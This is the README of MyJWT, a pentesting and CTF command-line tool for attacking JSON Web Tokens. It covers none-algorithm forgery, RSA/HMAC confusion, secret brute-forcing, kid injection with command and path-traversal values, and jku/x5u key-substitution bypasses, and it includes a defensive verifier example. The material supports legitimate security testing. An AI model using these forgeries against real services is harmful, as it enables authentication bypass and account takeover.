Project author: mBouamama

Project description:
A CLI for cracking and testing vulnerabilities on JSON Web Tokens (JWT)
Language: Python
Project URL: git://github.com/mBouamama/MyJWT.git
Created: 2020-10-26T20:11:56Z
Project community: https://github.com/mBouamama/MyJWT

License: MIT License



MyJWT


Introduction

This CLI is for pentesters, CTF players, or developers.

You can modify your JWT, sign, inject, etc.

Check the documentation for more information.

If you see problems or have an enhancement to suggest, open an issue. I will respond as soon as possible.
Enjoy :)

Documentation

Documentation is available at http://myjwt.readthedocs.io


Installation

To install myjwt, simply use pip:

```bash
pip install myjwt
```

To run myjwt from a docker image, run:

```bash
docker run -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt
# mount volume for wordlist
docker run -v $(pwd)/wordlist:/home/wordlist/ -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt
# On Windows
docker run -v %CD%/wordlist:/home/wordlist/ -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt
```

To install myjwt from git:

```bash
git clone https://github.com/mBouamama/MyJWT.git
cd ./MyJWT
pip install -r requirements.txt
python MyJWT/myjwt_cli.py --help
```

To install myjwt on BlackArch:

```bash
pacman -S myjwt
```


Usage

```
$ myjwt --help
Usage: myjwt [OPTIONS] JWT

  This cli is for pentesters, CTF players, or dev.

  You can modify your jwt, sign, inject ,etc...

  Full documentation is at http://myjwt.readthedocs.io.

  If you see problems or enhancement send an issue.I will respond as soon as possible.

  Enjoy :)

  All new jwt will be copy to the clipboard.

Options:
  --version                    Show the version and exit.
  --full-payload TEXT          New payload for your jwt.Json format Required.
  -h, --add-header TEXT        Add a new key, value to your jwt header, if key
                               is present old value will be replaced.Format:
                               key=value.
  -p, --add-payload TEXT       Add a new key, value to your jwt payload, if
                               key is present old value will be
                               replaced.Format: key=value.
  --sign TEXT                  Sign Your jwt with key given.
  --verify TEXT                verify your key.
  -none, --none-vulnerability  Check None Alg vulnerability.
  --hmac PATH                  Check RS/HMAC Alg vulnerability.
  --bruteforce PATH            Bruteforce to guess the secret used to sign the
                               token.
  -c, --crack TEXT             regex to iterate all string possibilities to
                               guess the secret used to sign the token.
  --kid TEXT                   Kid Injection sql
  --jku TEXT                   Jku Header to bypass authentication
  --x5u TEXT                   X5u Header to bypass authentication
  --crt TEXT                   For x5cHeader, force crt file
  --key TEXT                   For jku or x5c Header, force private key to
                               your key file
  --file TEXT                  For jku Header and x5u Header, force file name
  --print                      Print Decoded JWT
  -u, --url TEXT               Url to send your jwt.
  -m, --method TEXT            Method use for send request to url.(Default
                               GET).
  -d, --data TEXT              Data send to your url.Format: key=value. if
                               value = MY_JWT value will be replace by new
                               jwt.
  -c, --cookies TEXT           Cookies to send to your url.Format: key=value.
                               if value = MY_JWT value will be replace by new
                               jwt.
  --help                       Show this message and exit.
```

Modify JWT

| Option | Type | Example | Help |
|---|---|---|---|
| `--full-payload` | JSON | `{"user": "admin"}` | New payload for your JWT. |
| `-h`, `--add-header` | key=value | `user=admin` | Add a new key/value pair to your JWT header. If the key is present, the old value is replaced. |
| `-p`, `--add-payload` | key=value | `user=admin` | Add a new key/value pair to your JWT payload. If the key is present, the old value is replaced. |

Check Your JWT (HS alg)

| Option | Type | Example | Help |
|---|---|---|---|
| `--sign` | text | `mysecretkey` | Sign your JWT with your key. |
| `--verify` | text | `mysecretkey` | Verify your key. |

Exploit

| Option | Type | Example | Help |
|---|---|---|---|
| `-none`, `--none-vulnerability` | Nothing | | Check None Alg vulnerability. |
| `--hmac` | PATH | `./public.pem` | Check RS/HMAC Alg vulnerability, and sign your JWT with the public key. |
| `--bruteforce` | PATH | `./wordlist/big.txt` | Brute force to guess the secret used to sign the token. Use a txt file with all passwords stored, one per line. |
| `--crack` | REGEX | `"[a-z]{4}"` | Regex to iterate all string possibilities to guess the secret used to sign the token. |
| `--kid` | text | `"00; echo /etc/.passwd"` | Kid Injection sql |
| `--jku` | text | `MYPUBLICIP` | Jku Header to bypass authentication. Use `--file` if you want to change your jwks file name, and `--key` if you want to use your own private pem. |
| `--x5u` | text | `MYPUBLICIP` | For jku or x5c Header. Use `--file` if you want to change your jwks file name, and `--key` if you want to use your own private pem. |
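Seen from the verifying side, each option in the table above probes one decision a JWT verifier makes. The following is an added example, not part of MyJWT: a standard-library HS256 verifier that binds every `kid` to one algorithm and key and refuses key-location headers, run against constructed tokens. `KEYS`, `check`, `make_token`, the secret and the `example.invalid` URL are all assumptions made for the illustration.

```python
import base64
import hashlib
import hmac
import json

# Constructed registry: each kid is bound to exactly one algorithm and one key.
KEYS = {"001": ("HS256", b"constructed-demo-secret-0123456789abcdef")}
KEY_LOCATION_HEADERS = {"jku", "x5u", "x5c", "jwk"}  # a token must not name its own key

def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def b64url_decode(part: str) -> bytes:
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))

def make_token(header: dict, payload: dict, key: bytes) -> str:
    """Build an HMAC-SHA256 signed token; used only for the constructed samples."""
    signing_input = ".".join(b64url_encode(json.dumps(p).encode()) for p in (header, payload))
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(sig)}"

def check(token: str) -> str:
    """Return "accepted" or the reason the token is rejected."""
    try:
        head_b64, body_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(head_b64))
        sig = b64url_decode(sig_b64)
    except ValueError:
        return "malformed token"
    if not isinstance(header, dict):
        return "malformed token"
    if header.keys() & KEY_LOCATION_HEADERS:
        return "key-location header refused"
    kid = header.get("kid")
    if not isinstance(kid, str) or kid not in KEYS:  # exact match, never a path or query
        return "unknown kid"
    alg, key = KEYS[kid]
    if header.get("alg") != alg:  # the registry decides: blocks "none" and RS/HS switching
        return "algorithm mismatch"
    expected = hmac.new(key, f"{head_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    return "accepted" if hmac.compare_digest(sig, expected) else "bad signature"

# Constructed sample tokens, one per class of check in the table above.
SAMPLES = {
    "valid": make_token({"alg": "HS256", "kid": "001"}, {"username": "guest"}, KEYS["001"][1]),
    "none": make_token({"alg": "none", "kid": "001"}, {"username": "admin"}, b""),
    "kid": make_token({"alg": "HS256", "kid": "../../../../../../dev/null"}, {"username": "admin"}, b""),
    "jku": make_token({"alg": "HS256", "kid": "001", "jku": "https://jwks.example.invalid/jwk.json"}, {"username": "admin"}, b"x"),
}
```

The brute-force and crack options have no code-level counterpart here: they are defeated only by a long, random signing secret.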

Send your jwt

| Option | Type | Example | Help |
|---|---|---|---|
| `-u`, `--url` | url | `http://challenge01.root-me.org/web-serveur/ch59/admin` | URL to send your JWT to. |
| `-m`, `--method` | text | `POST` | Method used to send the request to the URL (default: GET). |
| `-d`, `--data` | key=value | `secret=MY_JWT` | Data to send to your URL. Format: key=value. If value = MY_JWT, the value will be replaced by your new JWT. |
| `-c`, `--cookies` | key=value | `secret=MY_JWT` | Cookies to send to your URL. Format: key=value. If value = MY_JWT, the value will be replaced by your new JWT. |

Other

| Option | Type | Example | Help |
|---|---|---|---|
| `--crt` | PATH | `./public.crt` | For x5cHeader, force crt file |
| `--key` | PATH | `./private.pem` | For jku or x5c Header, force private key to your key file |
| `--file` | text | `myfile` | For jku Header, force file name without .json extension |
| `--print` | Nothing | | Print Decoded JWT |
| `--help` | Nothing | | Show Helper message and exit. |
| `--version` | Nothing | | Show Myjwt version |

Examples

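```python
from myjwt.modify_jwt import add_header, change_payload
from myjwt.utils import jwt_to_json, SIGNATURE, encode_jwt

# jwt holds the token string to modify
jwt_json = jwt_to_json(jwt)
jwt_json = add_header(jwt_json, {"kid": "001"})
jwt_json = change_payload(jwt_json, {"username": "admin"})
jwt = encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE]
```

Full example here: [01-modify-jwt](https://github.com/mBouamama/MyJWT/blob/master/examples/01-modify-jwt/modify-jwt.py)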
## None Vulnerability

### CLI

```bash
myjwt YOUR_JWT --none-vulnerability
```

### CODE

```python
from myjwt.utils import jwt_to_json, SIGNATURE, encode_jwt
from myjwt.vulnerabilities import none_vulnerability

jwt_json = jwt_to_json(jwt)
jwt = none_vulnerability(encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE])
```

Full example here: [02-none-vulnerability](https://github.com/mBouamama/MyJWT/blob/master/examples/02-none-vulnerability/none-vulnerability.py)
## Sign Key

### CLI

```bash
myjwt YOUR_JWT --sign YOUR_KEY
```

### CODE

```python
from myjwt.modify_jwt import signature
from myjwt.utils import jwt_to_json

key = "test"
jwt = signature(jwt_to_json(jwt), key)
```

Full example here: [03-sign-key](https://github.com/mBouamama/MyJWT/blob/master/examples/03-sign-key/sign-key.py)
## Brute Force

### CLI

```bash
myjwt YOUR_JWT --bruteforce PATH
```

### CODE

```python
from myjwt.vulnerabilities import bruteforce_wordlist

wordlist = "../../wordlist/common_pass.txt"
key = bruteforce_wordlist(jwt, wordlist)
```

Full example here: [04-brute-force](https://github.com/mBouamama/MyJWT/blob/master/examples/04-brute-force/brute-force.py)
## Crack

### CLI

```bash
myjwt YOUR_JWT --crack REGEX
```

## RSA/HMAC Confusion

### CLI

```bash
myjwt YOUR_JWT --hmac FILE
```

### CODE

```python
from myjwt.vulnerabilities import confusion_rsa_hmac

file = "public.pem"
jwt = confusion_rsa_hmac(jwt, file)
```

Full example here: [05-rsa-hmac-confusion](https://github.com/mBouamama/MyJWT/blob/master/examples/05-rsa-hmac-confusion/rsa-hmac-confusion.py)
## Kid Injection

### CLI

```bash
myjwt YOUR_JWT --kid INJECTION
```

### Code

```python
from myjwt.modify_jwt import signature
from myjwt.utils import jwt_to_json
from myjwt.vulnerabilities import inject_sql_kid

injection = "../../../../../../dev/null"
sign = ""
jwt = inject_sql_kid(jwt, injection)
jwt = signature(jwt_to_json(jwt), sign)
```

Full example here: [06-kid-injection](https://github.com/mBouamama/MyJWT/blob/master/examples/06-kid-injection/kid-injection.py)
## Send your new Jwt to url

### CLI

```bash
myjwt YOUR_JWT -u YOUR_URL -c "jwt=MY_JWT" --none-vulnerability --add-payload "username=admin"
```

## Jku Vulnerability

### CLI

```bash
myjwt YOUR_JWT --jku YOUR_URL
```

### Code

```python
from myjwt.vulnerabilities import jku_vulnerability

new_jwt = jku_vulnerability(jwt=jwt, url="MYPUBLIC_IP")
# Print the newly generated token, not the original one
print(new_jwt)
```

Full example here: [07-jku-bypass](https://github.com/mBouamama/MyJWT/blob/master/examples/07-jku-bypass/jku-bypass.py)
## X5U Vulnerability

### CLI

```bash
myjwt YOUR_JWT --x5u YOUR_URL
```

### Code

```python
from myjwt.vulnerabilities import x5u_vulnerability

newJwt = x5u_vulnerability(jwt=jwt, url="MYPUBLIC_IP")
# Print the newly generated token, not the original one
print(newJwt)
```

Full example here: 08-x5u-bypass

Download

Check github releases. Latest is available at https://github.com/mBouamama/MyJWT/releases/latest

Contribute

  • Fork this repository or clone it
  • Create a new branch (feature, hotfix, etc…)
  • Make necessary changes and commit those changes
  • Check lint with `make lint`
  • Check unit tests with `make test`
  • Send a pull request

I will check as soon as possible.

Change log

The log’s become rather long. It moved to its own file.

See CHANGES.